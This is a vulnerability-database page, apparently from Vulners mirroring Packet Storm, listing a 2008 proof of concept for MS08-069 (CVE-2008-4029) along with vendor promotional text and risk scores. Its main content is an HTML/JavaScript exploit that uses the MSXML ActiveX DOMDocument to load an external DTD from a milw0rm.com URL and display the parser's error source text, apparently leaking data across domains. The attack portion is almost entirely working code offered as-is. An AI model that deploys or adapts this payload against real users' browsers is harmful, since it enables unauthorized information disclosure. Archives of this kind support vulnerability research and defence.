Lucene search
+L

ms08-069.txt

🗓️ 24 Nov 2008 00:00:00Reported by Jerome AthiasType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 47 Views

Vulnerability in KB955218 with CVE-2008-4029

Related
Code
`<html>  
<body>  
KB955218 - CVE-2008-4029 - JA  
<script type="text/javascript">  
var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");  
dom.async = false;  
var url = "http://www.milw0rm.com/forfun.dtd";  
var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";  
if (dom.loadXML(xml) == 0)  
{  
alert("Blue or Red Pill? " + dom.parseError.srcText);  
}  
</script>  
</body>  
</html>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2008 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.26737
47